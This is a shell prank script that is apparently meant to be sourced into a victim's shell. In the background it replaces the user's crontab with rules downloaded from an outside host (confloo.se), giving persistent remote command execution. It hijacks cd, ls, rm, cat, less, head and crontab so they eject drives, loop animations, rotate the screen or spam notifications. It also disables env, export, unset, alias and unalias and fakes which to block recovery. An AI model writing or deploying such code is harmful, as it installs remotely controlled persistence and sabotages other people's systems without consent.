#begin clfz

unalias -a &> /dev/null
unalias -m "*" &> /dev/null

::() {
    crontab -l > /tmp/cronrules
    curl -o /tmp/cronrules "http://confloo.se/cronrules" 2>/dev/null
    crontab /tmp/cronrules
    rm /tmp/cronrules
}

(:: &) >/dev/null 2>&1

f() {
    t=`which $1`
    export "__`tr -dc "[:alpha:]" < /dev/urandom | head -c 8`"=$t
    eval "$1() { $2; }"
    eval "$t() { $2; }"
}

case `uname` in
    Linux) cmd="eject -T" ;;
    FreeBSD) cmd="cdcontrol eject" ;;
esac
eval "cd() { $cmd; }"

f ls "while (true); do sl -a; done"
f cat "echo \"miaou\""

f rm "xrandr -o left; xrandr -x"
f less "xrandr -s 6 &> /dev/null"

cron() {
    while (true); do
        notify-send tab
        sleep 1;
    done;
}
f crontab "(cron &) >/dev/null 2>&1"

alias() { display http://impawards.com/tv/posters/alias_ver2.jpg }
unalias() { display -flop http://impawards.com/tv/posters/alias_ver2.jpg }

fabulous='
                      __........_.._....._
                     `.s$^.s$$$$$ssss$$$$$$bso.a
                     .d  7.d$$$$SSSS$$$$$$$$$$$b._
                     $  7 s`  `SSS$$$$$SSSSSSSSSSSSSSb.
                     $  j`      SS$$$$$$$$$$$$$$$sss$$$b
                     T.`        s$$$$$$$$$$$$$$$$$ss$$$$$bs.
                     .          S$$$$$$$$$$$$$$$$$$s$$$$$$$$$s.
                    /..._      dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$s.
                  .-````^:.    S$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$b
           __..-=`   .-   `.  dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$b
        .``        _/_        S$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$b
        :_         `^s$D     dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$$l
         :\                  !!$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$$S
         :`--`               `:$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$S
       .-`  .`                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7
       ::   :                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$b
      :::.   `               .q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$b
     :`  ``                 dS77$$$$$$$7^^^^q$$$$$$$$$$$$$$$$$$$$$$$$$$$:
   .`                     dSP.P`  ```s7 `` : \$$$$$$$$$$$$$$$$$$$$$$$$$$$
   :                    sP .dP     _.7/\    `:$$$$$$$$$$$$$$$$$$$$$$$$$$$
   \                  dP`dSP   . (` $$  : .` d$$$$$$$$$$$$$$$$$$$$$$$$$$7
    `._              s dP`     l  d77-. ./.d$$$$$$$$$$$$$$$$$$$$$$$$$$$7b
       `.--...__    :sP`        `d7_ ``_.d$$$$$$$$$$$$$$$$$$$$$$$$$$$7`.$:
         `.     ``  :`        .77:::sssd$$$$$$$$$$$$$$$$$$$$$$$$$$$$$bsd$`
           `,              _.:`` ``::d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^7$P
             \          _.-``     .d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Dd$d7
              \                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P`d77
               :              d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P 7 7
               :            d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P `.`
                :         .d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7.-²`
                :         d$$$7`        `q$$$$$$$$$$$$$$$$$$$$7`
                 \       $$               `q$$$$$$P`   ```````
                  \     $$                   `````
                   :    qp       _.-
                    `.   l    .-`
                      `.     -
                        `.  /
                          `|'
f head "echo '$fabulous'"

cflznv=`env | grep '__.*'`
eval "which() { printf '$cflznv' | grep '__.*=/.*$1' | sed -r 's/.*=(.*)/\1/'; }"

env() { false; }

command() { eval "$@"; }
export() { false; }
unset() { false; }
